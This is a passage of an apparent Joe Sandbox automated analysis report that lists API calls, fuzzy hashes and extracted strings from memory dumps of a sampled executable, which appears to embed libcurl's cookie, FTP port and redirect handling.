                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ___from_strstr_to_strchrfgets
                                        • String ID:
                                        • API String ID: 4248516992-0
                                        • Opcode ID: c7db5857224c01f43b5def31efd87076a8d91383b680c63ceca060665c509dce
                                        • Instruction ID: d0100ee7832ec89f7f6c7e622f7d57e8be3662aa7a3e2fbc5065ce8afe56bbdc
                                        • Opcode Fuzzy Hash: c7db5857224c01f43b5def31efd87076a8d91383b680c63ceca060665c509dce
                                        • Instruction Fuzzy Hash: 40114C356003869ADB158F28DC01FEDB3E89F49350F1440ADE645D3141EBF49AC587A4
                                        APIs
                                        • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,000C8EF6), ref: 000D2208
                                        • WSACleanup.WS2_32 ref: 000D2227
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: CleanupFreeLibrary
                                        • String ID:
                                        • API String ID: 470324515-0
                                        • Opcode ID: aaa76cf02275ce7394f81667f6776554e5cc0989e98532488b3109ff86742c73
                                        • Instruction ID: 2a30072209826e177e9f332de340dc0586c4c2af020008fa397ac668a9f2ef9a
                                        • Opcode Fuzzy Hash: aaa76cf02275ce7394f81667f6776554e5cc0989e98532488b3109ff86742c73
                                        • Instruction Fuzzy Hash: 6EF04972611340ABD7799F28FE48B653BF4FB18306F18407EE540C6AA2C76488A3CB21
                                        APIs
                                          • Part of subcall function 0011167B: GetModuleHandleW.KERNEL32(00000000,001112E6), ref: 0011167D
                                        • _c_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0011132F
                                        • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000007,0012D000,00000014), ref: 0011135E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: HandleModule_c_exit_exit
                                        • String ID:
                                        • API String ID: 750871209-0
                                        • Opcode ID: 3c1777749d1cee31703bb350baeb5762b3e2989e4a6dd223fce7200e68ead2c0
                                        • Instruction ID: d74927d106f1170e859d26778ef57f3a5a99cdc5316d2c0faa6bd9341e14be5d
                                        • Opcode Fuzzy Hash: 3c1777749d1cee31703bb350baeb5762b3e2989e4a6dd223fce7200e68ead2c0
                                        • Instruction Fuzzy Hash: 51E08C32A08249AFCF28ABD8E9023DCF772FB40324F100176DA21376A1D73618908A90
                                        APIs
                                        • socket.WS2_32(00000017,00000002,00000000), ref: 000EE9A6
                                        • closesocket.WS2_32(00000000), ref: 000EE9B2
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: closesocketsocket
                                        • String ID:
                                        • API String ID: 2760038618-0
                                        • Opcode ID: 450cc3a95e74e284a193d48732d39d9c6d50c2b9d19e3bfc58ae81eb3efe3352
                                        • Instruction ID: 263f099918e6e83fb5acb154c8548c5143835165e500e6f18cca54f6af83d9a4
                                        • Opcode Fuzzy Hash: 450cc3a95e74e284a193d48732d39d9c6d50c2b9d19e3bfc58ae81eb3efe3352
                                        • Instruction Fuzzy Hash: B0D02B741451849FDE144BB08C9DBE537956741315F049264F4219B6D2C2114C029620
                                        APIs
                                        • closesocket.WS2_32(000E1EF4), ref: 000DF433
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: closesocket
                                        • String ID:
                                        • API String ID: 2781271927-0
                                        • Opcode ID: 784815eaa1d64e8df91c548b5c2993dd2865648caa67ac3fd69f99f9ca260154
                                        • Instruction ID: 46d08b14b85b09a141b268ccc0e6eadcca4bffdf2cd84aa559e3811b28a202c4
                                        • Opcode Fuzzy Hash: 784815eaa1d64e8df91c548b5c2993dd2865648caa67ac3fd69f99f9ca260154
                                        • Instruction Fuzzy Hash: 1901A2316047108BC7256B3498897BFB7D6ABC4314F48803FE44A93751CA74AC4583A5
                                        APIs
                                        • _open.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000100,00000180,?,000C2077,?,00008501,00000180), ref: 000D0B2D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _open
                                        • String ID:
                                        • API String ID: 4183159743-0
                                        • Opcode ID: 6dad21515287f7bdad97a633a4a333314bb2ad3e02e8f6ee262b331671ba354f
                                        • Instruction ID: 376ed5815f7fa6bf8cf60a3255eddf6573230311cf375ac929952c69e13a3eb3
                                        • Opcode Fuzzy Hash: 6dad21515287f7bdad97a633a4a333314bb2ad3e02e8f6ee262b331671ba354f
                                        • Instruction Fuzzy Hash: 7BD0123100060DEBCF014F64EC0599A37E9BF44354F00C014FD2C85020D771D974AF40
                                        APIs
                                        • SetConsoleMode.KERNELBASE(000C31F4), ref: 000C31D9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ConsoleMode
                                        • String ID:
                                        • API String ID: 4145635619-0
                                        • Opcode ID: c494d07ee6f17f342ab672c0cda0cda49de21b8e6f6a5f7b016109add09e8d77
                                        • Instruction ID: 0c4d7ff1929682be6f1b75f9ed87c0eccb8fe26e9e328c01e01660d5f61dd564
                                        • Opcode Fuzzy Hash: c494d07ee6f17f342ab672c0cda0cda49de21b8e6f6a5f7b016109add09e8d77
                                        • Instruction Fuzzy Hash: ECC04C30211611BFCF57CF78FE14A5436B2AB45345714407C9615D5974DB21C9A3DF50
                                        APIs
                                        • FreeLibrary.KERNELBASE(00000000,000D2221,?,000C8EF6), ref: 000F4EE2
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 1c0cdeffae751483300e1464e0eaf48367d23815eb41c08706ae1241a67569de
                                        • Instruction ID: a6801bbd81d8231cc6f4b2742b58df04c45cd37ae0fe1c0ff7e45e98cde7135d
                                        • Opcode Fuzzy Hash: 1c0cdeffae751483300e1464e0eaf48367d23815eb41c08706ae1241a67569de
                                        • Instruction Fuzzy Hash: 02C04C75510642EFD7618F28FD0C76733B8BB40B67F40443C9500D1C60E77884ABCA10
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000ED06B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 3b5ae5b90c6742c1799113c1500857ab0f0a60e7598f9d5366ae782c70824cb2
                                        • Instruction ID: b95278374ce0afe009540d906b55b2c715d8444eb08cd4b3b531f651391056e1
                                        • Opcode Fuzzy Hash: 3b5ae5b90c6742c1799113c1500857ab0f0a60e7598f9d5366ae782c70824cb2
                                        • Instruction Fuzzy Hash: 21F08232700612DFD7649F29E884795F3B5FF44361F29412BE82093641CB79BD92CAE5
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D7B80
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: malloc
                                        • String ID:
                                        • API String ID: 2803490479-0
                                        • Opcode ID: 8e364d6724b511ca94452b8bcb1811e920fa6ded252d82880ebb1074a2229640
                                        • Instruction ID: 6fd0b6164c510a7d99dfd38da8ab703feaa45086388d1c06b4f12ec61adb54ef
                                        • Opcode Fuzzy Hash: 8e364d6724b511ca94452b8bcb1811e920fa6ded252d82880ebb1074a2229640
                                        • Instruction Fuzzy Hash: 9AE0867271D6159EF7588A28FC00B99B3DAFB84720F00013BE218C3144EBB068824A94
                                        APIs
                                        • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,00000000,00000000,?,000E09DF,?,00000001,0000000C,00000000,00000000,00000001), ref: 000DFB30
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DFB5E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DFBA1
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000DFBAC
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(__Secure-,0000005F,00000009), ref: 000DFD02
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(__Host-,?,00000007), ref: 000DFD23
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DFE2F
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000DFE73
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000DFFC8
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000DFFE5
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000E012C
                                        • _strrchr.LIBCMT ref: 000E013A
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E016E
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,#HttpOnly_,0000000A), ref: 000E01D0
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000E01F0
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000E0201
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000E0610
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E06CC
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E06E0
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E06F4
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E0708
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E071C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E0730
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E0744
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E0758
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E0778
                                          • Part of subcall function 000DF9D3: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF9EA
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E086B
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000E08DD
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00001000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E093F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E096E
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000E0992
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00001000,?,?,?,?,?,?,?,?,?,?,00000000,?,?,000E126F), ref: 000E0A02
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000E0A14
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$___from_strstr_to_strchr$strncmp$callocfclosemalloc$__acrt_iob_func_strrchr_time64
                                        • String ID: #HttpOnly_$%4095[^;=] =%4095[^;]$%s cookie %s="%s" for domain %s, path %s, expire %I64d$=$Added$FALSE$Replaced$TRUE$WARNING: failed to open cookie file "%s"$_$_$__Host-$__Secure-$domain$expires$httponly$localhost$max-age$none$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                        • API String ID: 2930520296-3004133991
                                        • Opcode ID: dd91c41c989213d65755343c693b57ecc9feb225133b29ac8bedb06494b983fb
                                        • Instruction ID: efea8e1d0d4d67a833fb36245baebc47c3e2adc95523ef3b6f49fe49515d4744
                                        • Opcode Fuzzy Hash: dd91c41c989213d65755343c693b57ecc9feb225133b29ac8bedb06494b983fb
                                        • Instruction Fuzzy Hash: D1924930A043969FDB258F25D8443B97BE1BF45310F1480BBD88AA7683DBB09DD1CBA1
                                        APIs
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FA997
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000FA9B5
                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 000FAA1F
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000FAA33
                                        • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,00000000,0000000A), ref: 000FAA4B
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000FAA5A
                                        • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,00000000,0000000A), ref: 000FAA6B
                                        • getsockname.WS2_32(?,?,?), ref: 000FAB16
                                        • WSAGetLastError.WS2_32 ref: 000FAB21
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FABEA
                                        • WSAGetLastError.WS2_32 ref: 000FAC18
                                        • htons.WS2_32(?), ref: 000FAC95
                                        • bind.WS2_32(000000FF,?,00000080), ref: 000FACB3
                                        • WSAGetLastError.WS2_32 ref: 000FACC1
                                        • getsockname.WS2_32(?,?,00000080), ref: 000FAD1D
                                        • WSAGetLastError.WS2_32 ref: 000FAD53
                                          • Part of subcall function 000DA0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA0C3
                                          • Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0CB
                                          • Part of subcall function 000DA0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0DD
                                          • Part of subcall function 000DA0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 000DA0EC
                                          • Part of subcall function 000DA0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 000DA0F6
                                          • Part of subcall function 000DA0B8: _strrchr.LIBCMT ref: 000DA142
                                          • Part of subcall function 000DA0B8: _strrchr.LIBCMT ref: 000DA15C
                                          • Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA173
                                          • Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA180
                                          • Part of subcall function 000DA0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA188
                                          • Part of subcall function 000DA0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 000DA193
                                          • Part of subcall function 000DF3FC: closesocket.WS2_32(000E1EF4), ref: 000DF433
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FB090
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ErrorLast$___from_strstr_to_strchr_errno$_strrchrfreegetsocknamestrncpystrtoul$__sys_errlist__sys_nerrbindcallocclosesockethtons
                                        • String ID: %s %s$%s |%d|%s|%hu|$,$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                                        • API String ID: 2930231303-3103743990
                                        • Opcode ID: b48fe0ac9819612b721a6ecb74bfe290a4c3fbd5a309a241082055a428753e2d
                                        • Instruction ID: c2e0c39d2421a0659120527d1d4ef0e31693fb697fd314cbad520314da26decb
                                        • Opcode Fuzzy Hash: b48fe0ac9819612b721a6ecb74bfe290a4c3fbd5a309a241082055a428753e2d
                                        • Instruction Fuzzy Hash: 8322F8B0B0022D9FDB24DF24DC85BFE77B6AF85300F0440A9E94997682DB714E949F66
                                        APIs
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(if!,?,00000003), ref: 000DDF9A
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(host!,?,00000005), ref: 000DDFC9
                                        • inet_pton.WS2_32(00000017,?,?), ref: 000DE0C2
                                        • inet_pton.WS2_32(00000002,?,?), ref: 000DE0EB
                                        • htons.WS2_32(?), ref: 000DE100
                                        • htons.WS2_32(?), ref: 000DE136
                                        • htons.WS2_32(?), ref: 000DE18A
                                        • bind.WS2_32(?,?,?), ref: 000DE1A5
                                        • getsockname.WS2_32(?,?,?), ref: 000DE1E0
                                        • WSAGetLastError.WS2_32 ref: 000DE1EA
                                        • WSAGetLastError.WS2_32 ref: 000DE21C
                                        Strings
                                        • Couldn't bind to interface '%s', xrefs: 000DDFAB
                                        • Local port: %hu, xrefs: 000DE246
                                        • host!, xrefs: 000DDFC4
                                        • bind failed with errno %d: %s, xrefs: 000DE23B
                                        • if!, xrefs: 000DDF95
                                        • Name '%s' family %i resolved to '%s' family %i, xrefs: 000DE07D
                                        • Couldn't bind to '%s', xrefs: 000DE119
                                        • getsockname() failed with errno %d: %s, xrefs: 000DE209
                                        • Bind to local port %hu failed, trying next, xrefs: 000DE177
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: htons$ErrorLastinet_ptonstrncmp$bindgetsockname
                                        • String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s$host!$if!
                                        • API String ID: 2929934046-1901189404
                                        • Opcode ID: a31fc9f37a6a508334823468e8fcf1c79f77f168da2981b12b503fb697e550f6
                                        • Instruction ID: 4eb1c5eee8f4789cc9b48034e65216c85d9280f47a47f1a2906dc16a3509d09f
                                        • Opcode Fuzzy Hash: a31fc9f37a6a508334823468e8fcf1c79f77f168da2981b12b503fb697e550f6
                                        • Instruction Fuzzy Hash: ACA1C775A00368ABDB64AB24DC49FE977B8AF45700F1441A6F44DEB341EB709EC08BA1
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EC286
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EC446
                                        • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 000EC453
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EC46D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EC4EB
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EC508
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EC527
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EC590
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$atoi
                                        • String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s
                                        • API String ID: 2493182076-1748258277
                                        • Opcode ID: a6d818fb4a2c307812207ee7f595a45ed0817d4fdf6314baf44f2e20bf34eca0
                                        • Instruction ID: 40e2d8c6fe9a736eac457fb2e15d69b725f8c1f70b72295907f73d98e11287a7
                                        • Opcode Fuzzy Hash: a6d818fb4a2c307812207ee7f595a45ed0817d4fdf6314baf44f2e20bf34eca0
                                        • Instruction Fuzzy Hash: 74D14A71B04686AFFB288B759881FBEB7E5FF45310F14812BE814B7281CB726D528791
                                        APIs
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB20
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB42
                                        • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB9C
                                        • ___from_strstr_to_strchr.LIBCMT ref: 0010CD4F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010D01D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010D033
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$___from_strstr_to_strchrcallocmallocrealloc
                                        • String ID: 0123456789-$<DIR>$APM0123456789:$rwx-tTsS$total
                                        • API String ID: 1091099985-2767756851
                                        • Opcode ID: 6253f93ada8ffb00ced36f94e6aa44c273c440c34678d1067a317ac09f356131
                                        • Instruction ID: 5ccd546dc08adec6006c31d7e537912f5b3ed3ebfc88350b42f9f26d509002d2
                                        • Opcode Fuzzy Hash: 6253f93ada8ffb00ced36f94e6aa44c273c440c34678d1067a317ac09f356131
                                        • Instruction Fuzzy Hash: E8226870A04A029FD728CF69D644A21BBF1FF94310F15861AE49AC7AD1D7B1F891CF92
                                        APIs
                                        • CryptQueryObject.CRYPT32(00000002,?,00000002,0000000E,00000000,00000000,?,00000000,00000000,00000000,?), ref: 0010ECEF
